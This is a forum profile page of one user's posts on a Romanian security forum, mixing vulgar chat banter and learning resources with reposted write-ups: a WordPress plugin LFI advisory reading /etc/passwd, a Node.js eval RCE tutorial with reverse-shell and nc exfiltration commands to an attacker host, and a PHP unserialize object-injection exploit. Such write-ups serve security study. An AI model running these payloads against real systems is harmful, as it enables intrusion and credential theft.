Jump to content

Webz

Active Members
  • Posts

    264
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Webz

  1. Webz

    RST Bashed

    @aelius , Gecko mi-a dat ban acum cateva zile pe chat doar pentru ca mi-am bagat pula in el, da-mi unban, vreau sa il injur mai mult ! @fallen_angel da-mi unban moderatorule :))) @aelius Who's Chatting Sandu aelius badluck Nu ma parasi tovarase !
  2. Webz

    RST Bashed

    Acel moment cand te simti atat de neimportant
  3. [+] Date: [23-8-2016] [+] Autor Guillermo Garcia Marcos [+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip [+] Title: Mail Masta WP Local File Inclusion [+] info: Local File Inclusion The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); Source: /inc/lists/csvexport.php: Line 5: include($_GET['pl']); Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); Source: /inc/lists/csvexport.php Line 5: include($_GET['pl']); Source: /inc/campaign/count_of_send.php Line 4: include($_GET['pl']); This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server. Typical proof-of-concept would be to load passwd file: http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd Source :
  4. Web design in 4 minutes. Just click on links :3 magic
  5. Webz

    Noisli.

    Noisli helps you to : Noisli.. Îl folosesc şi eu când am galagie împrejur . Mă ajută să mă relaxez , ai ce combinaţii de sunete să alegi , iar unele sunt ,,,devastatoare,,
  6. NODEJS RCE AND A SIMPLE REVERSE SHELL While reading through the blog post on a RCE on demo.paypal.com by @artsploit, I started to wonder what would be the simplest nodejs app that I could use to demo a RCE. Looking at the hello world tutorials online, I came up with the following simple app that takes a user input via the URL as a GET parameter and passes it to eval, which is obviously a bad programming practice. Obviously, the functionality of this app is questionable, but in the real world Node applications will use eval to leverage JavaScript’s eval but with sandboxing amongst other things. var express = require('express'); var app = express(); app.get('/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); }); To access the app, navigate to http://hostip:8080/?q='Test'. The exploit can be triggered using the q parameter. Node provides the child_process module and the eval can be used to execute the exploit. A quick demo can consist of the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. 2. Navigate to http://hostip:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80') This will send the contents of /etc/passwd to the attacker’s nc instance. If the Node server has the traditional nc installed (instead of the openbsd alternative) you can even use -e /bin/bash to return a proper shell from the Node server. But as the case is with default installations the netcat that attacker’s love may not always be present on vulnerable machines. In such cases, the net module can be used to redirect the stdin, stdout and stderr streams to and from the attacker’s machine. The exploit code in such a case would be: var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(80, "attackerip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); To execute this, use the following steps: 1. Run nc -lvp 80 on a server you control and whose port 80 is reachable from the server running the Node app. Again, this would act as your shell listener/collector. 2. Navigate to http://hostip:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}); You can then use /bin/bash -i or python -c 'import pty; pty.spawn("/bin/bash")' to get a proper TTY shell (See more techniques here.). I created a docker image with Node and the app installed so that this is easier to test and play with. You can setup this PoC using the following steps: 1. Install docker on your host machine. This is the standard reference – https://docs.docker.com/engine/installation/ 2. Once docker is setup, run the following command: docker run -p 8080:8080 -d appsecco/node-simple-rce 3. Navigate to the Node app by going to: http://localhost:8080/?q=’Test’ Update: A simpler reverse shell is: require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.2/80 0>%261"') According to https://github.com/bahamas10/node-exec: For backwards compatibility with child_process.exec, it is also possible to pass a string to exec. The string will automatically be converted to [‘/bin/sh’, ‘-c’, ‘{string}’], which will cause the string to be parsed on the shell. Since /bin/sh has some trouble dealing with multiple file descriptors, we can simply ask /bin/sh to spawn a new /bin/bash and use the new /bin/bash to execute our standard reverse shellcode. Whew! The code is available on Github if you want to test this locally. Feel free to make any changes to the code and redistribute! Happy Hacking! Articol preluat de pe site-ul Mi s-a parut foarte interesant acest write-up , si m-am gandit sa il postez si aici. Sper sa va inspire !
  7. Hai sa luam fiecare domeniu si sa intrebam la ce sa il folosim. Sa fim seriosi , in pula mea gandeste-te putin la ce poti folosi domeniul ,,th1'' ... Nu e nimic sugestiv , e fix pula .
  8. Mie mi-a dat PM , dar in momentul de fata functioneaza link-ul. Multumesc pentru resurse !
  9. Frans Rosén has reported hundreds of security issues using his big white hat since 2012. The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
  10. Salut , Ca resurse / tutoriale iti mai pot recomanda cursul de pe Treehouse care este foarte detaliat si clar , iar versiunea pyhon-ului predata este versiunea 3 , care este recomandata pentru incepatori . Alte resurse folositoare : Complete python bootcamp Learn python the hard way Acum depinde ce aplicatii vrei sa creezi sau daca vrei sa te orientezi pe web ( django , flask ) , dar iti recomand si : Black hat Python Gray hat python Succes la invatat !
  11. Nu stiu cat o sa tina , dar din aparente o sa se bage foarte , foarte multa lume pe site
  12. Using Web Application Firewall to detect and block common web application attacks
  13. At NotSoSecure, we conduct Pen Test/ Code Reviews on a day-to-day basis and we recently came across an interesting piece of PHP code that could lead to RCE, but the exploitation was bit tricky. After spending some sleepless nights trying to break this code, we identified that both application and system level code execution was possible using the vulnerability. This blog post from Rahul Sasi will shed some info on the bug and exploitation part. The vulnerable code: PHP Vulnerable code In the above code, user controlled value could be passed on to PHP un-serialization function. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize(). Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. In our code the application takes a file name, which gets read using PHP file_get_contents function. The output is then fed to php unserialize module. With the above bug both application level and system level code executions is possible, we will get into that soon. PHP Unserialize In order to successfully exploit the above bug three conditions must be satisfied: The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”. All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes . The data passed to unserialized comes from a file, so a file with serialized data must be present on the server. Ref: https://www.owasp.org/index.php/PHP_Object_Injection In the above scenario, conditions 1 and 2 are satisfied for exploitation. But since the input to un-searilized comes from a file read by PHPfile_get_contents, it was bit tricky to exploit. PHP function file_get_contents can be passed with remote URLs if allow_url_fopen is enabled (on latest PHP versions its disabled by default). In one such case an attacker could pass in a url with a file containing serialized malicious data hosted on a remote server. http://vul-server/unsearilize.php?session_filename=http://attacker/exp.txt Contents of exp.txt O:3:%22foo%22:2:{s:4:%22file%22;s:9:%22shell.php%22;s:4:%22data%22;s:5:%22aaaa%22;} But unfortunately allow_url_fopen was not enabled on the applications we were testing. Note: It is not possible to include a file like /proc/self/environor anything similar (like access logs) since, a serialized string should not contain garbage data. So our file should only contain the serialized data for the exploit to work. Before we move on to how to exploit the above code let me explain a bit on PHP object injection exploit and what the above payload does. PHP Object Injection: Php Unserialization based security issues were first documented by Stefan Esser in 2009 . These days with the increase in number of json based applications serialization modules are used a lot. Lets learn more about the serialization modules. PHP Serialization: In order to preserve the contents on an array PHP has this function called serialize() ,it converts an array, given as parameter, into a normal string that you can be saved in a file, passed as an input to a URL etc. PHP serialize function Ref: http://www.hackingwithphp.com/5/11/0/saving-arrays Serialization example: Serializing a 3 char string array. Example Serialize 3 char string array Understanding the serialized string Understanding serialized string a:3{ Array of 3 values i:0 Integer, value [ index-0] S:5:”Lorem” String, 5 chars long, string value “Lorem” i:1 Integer, value [index-1] S:5:”Ipsum” String , 5 chars long, string value “Ipsum” i:2 Integer, value [index-2] S:5:”Dolor” String , 5 chars long, string value “Dolor” PHP UnSerialization unserialization() is the opposite of serialize(). It takes a serialized string and converts it back to an array object. Un-serialization can result in code being loaded and executed due to object instantiation and auto loading. Example: value=‘a:1:{s:4:"Test";s:17:"Unserializationhere!";}’ unserialize($value); Php Autoloading: In PHP, we can define some special functions that will be called automatically. Such functions require no function call to execute the code inside. With this special feature, these are commonly referred as magic functions or magic methods. PHP magic method names are limited with some list of PHP supported keywords, like construct, destruct etc. The most commonly used magic function is __construct(). This is because as of PHP version 5, the __construct method is basically the constructor for your class. If PHP 5 can not find the __construct() function for a given class, then it will search for a function with the same name as the class name – this is the old way of writing constructors in PHP, where you would just define a function with the same name as the class. Here are few magic functions in php: __construct(), __destruct(), __call(), __callSt atic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone(), and __autoload(). Here are few magic methods in php: Exception::__toStringErrorException::__toStringDateTime::__wakeupReflectionException::__toStringReflectionFunctionAbstract::__toStringReflectionFunction::__toStringReflectionParameter::__toStringReflectionMethod::__toStringReflectionClass::__toStringReflectionObject::__toStringReflectionProperty::__toStringReflectionExtension::__toStringLogicException::__toStringBadFunctionCallException::__toStringBadMethodCallException::__toStringDomainException::__toStringInvalidArgumentException::__toStringLengthException::__toStringOutOfRangeException::__toStringRuntimeException::__toString Ref: http://www.programmerinterview.com/index.php/php-questions/php-what-are-magic-functions/ Object instantiation: Instantiation is when a class becomes an object by creating an instance of the class in memory. So when you actually call new class(), class() is now an instantiated object. When you un-serialize a string that is exactly what php does [Object instantiation], converts a string of arrays into objects. Un-serializing objects allows to control all properties a) public protected c) private, however un-serialized objects get woken up __wakeup() and later destroyed via __destruct(), and hence already existing code placed inside these[wakeup,destruct] magic function gets executed. Ref:http://www.nds.rub.de/media/nds/attachments/files/2011/02/RUB2011-SecurityProblemsInWebApplicationsExceptInjectionVulnerabilities.pdf So we need to find existing usable code defined inside _destruct or _wakeup, and then hijack the flow of the application. In our vulnerable program we have destruct with a function file_put_contents: Destruct with file_put_contents So our payload looks like: O:3:%22foo%22:2:{s:4:%22file%22;s:9:%22shell.php%22;s:4:%22data%22;s:5:%22aaaa%22;} O:3{: [ Object, takes 3 parameter with name foo] ”foo”: 2:{ [Parameter foo takes 2 values] S:4:”file”;s:9:”shell.php”; [String, 4 chars long, value “file”, string 9 chars long, value shell.php] s:4:”data”;s:5:”aaaa”;} String, 4 chars long, string 5 chars long, value”aaaa” So when our above input string is un-serialized it allows controlling the properties of the class “foo”. An already existing code that is inside a magic method “_destruct” gets executed with our controlled values, in our case file_put_contents, creating a file “shell.php”. Exploitation: Since in our case, the input to Unserialization is the file read from file_get_contents. $file_name = $_GET['session_filename']; unserialize(file_get_contents($file )); One of the things we were trying out was to find a method to put up the exp.txt on the server. For this we had to find a file/image upload feature. And then uploaded the file with the serialized payload. Then all we had to do was trigger , the following way. http://vul-server/unsearilize.php?session_filename=images/exp.txt Alternately system level RCE is possible using CVE-2014-8142 and CVE-2015-0231 “Use-after-free vulnerability in the process_nested_data function in ext/standard/var_Unserializationr.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted Unserialization call that leverages improper handling of duplicate keys within the serialized properties of an object .” https://bugs.php.net/bug.php?id=68710 The above bug affects core php unsearilize function. The poc was released by Stefan Esser, we tried to optimize and make a code execution possible with the bug. Since its possible to attain system level RCE if successfully exploited. PHP + Apache Security Architecture: PHP Architecture These diagrams are good enough to explain php architecture in detail. 1) So if we could execute code in context of PHP , we would be able to break out of many restrictions. 2) Should be able to get shell access to hardned PHP Hosts. I am still working on this. And I have found that “Tim Michaud” from innulled is working on the same http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html . We will update this blog soon. http://[IP]/unserialize_rce_poc.php?s=O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:50:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA11111111111";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}'; POC code to leak memory POC code to leak memory POC code to leak memory References: http://www.inulledmyself.com/2015/02/exploiting-memory-corruption-bugs-in.html https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes http://php-autoloader.malkusch.de/en https://hakre.wordpress.com/2013/02/10/php-autoload-invalid-classname-injection http://security.stackexchange. com/questions/77549/is-php-Unserialization-exploitable-without-any-interesting- http://xahlee.info/php-doc/ http://phppot.com/php/php-magic-methods http://php.net/manual/en/ http://stackoverflow.com/questions/11630341/real-time-use-of-php-magic-methods-sleep-and-wakeup Source :
  14. :))))))))))) MOR MAI RAU CA INDIENII IN PULA MEA voi ne faceti de ras :))))))
  15. aelius , aveam si eu ban pe chat , poti sa mi-l scoti ? Cred ca tu mi l-ai dat. Trag pula.
  16. Fara sa inspectati codul , data viitoare puteti sa va da-ti seama doar din titlu , e unul destul de sugestiv : ,,[NEW] Priv8 PHP Mailer 2016 clean Script For free ...... :D''
  17. Webz

    CSRF PoC Generator

    Are si burp suite o functie asemanatoare
  18. Webz

    mySQL

    Scoate banu de pe chat raule
  19. Nu inteleg de ce tot ii ziceti ca a dat banii de pomana , ca si-a luat un laptop prea puternic , daca omul isi permite putea sa-si ia si macbook pro.
  20. Webz

    RST Bashed

    stiam ca ajunge pe bashed ma fac de cacat #cry #lol
×
×
  • Create New...